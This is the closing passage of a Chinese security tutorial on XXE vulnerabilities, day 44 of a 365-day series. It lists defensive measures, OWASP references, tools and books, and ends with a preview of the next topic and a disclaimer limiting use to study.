3. 渗透测试 4. 监控告警 **管理层**: 1. 安全培训 2. 安全开发生命周期 3. 第三方组件管理 4. 应急响应预案 --- ## 参考资料 ### 学习资源 - [OWASP XXE](https://owasp.org/www-community/vulnerabilities/XML_External_Entity_(XXE)_Processing) - [XXE Prevention Cheat Sheet](https://cheatsheetseries.owasp.org/cheatsheets/XML_External_Entity_Prevention_Cheat_Sheet.html) ### 工具资源 - [XXEinjector](https://github.com/enjoiz/XXEinjector) - [defusedxml](https://github.com/tiran/defusedxml) - [Burp Suite](https://portswigger.net/burp) ### 书籍推荐 - 《Web 安全深度剖析》 - 《XML 安全编程》 - 《白帽子讲 Web 安全》 --- **标记 明日预告**:Day 45 - 反序列化漏洞进阶 > 本文内容仅供学习和研究使用,请勿用于非法目的。所有实验请在隔离环境中进行。 --- *本文是 365 天信息安全技术系列的第 44 篇,Web 安全部分第 14 篇,精编版本*
myh0st
2026年4月13日 23:16
分享文档
收藏文档
上一篇
下一篇
微信扫一扫
复制链接
手机扫一扫进行分享
复制链接
Markdown文件
分享
链接
类型
密码
更新密码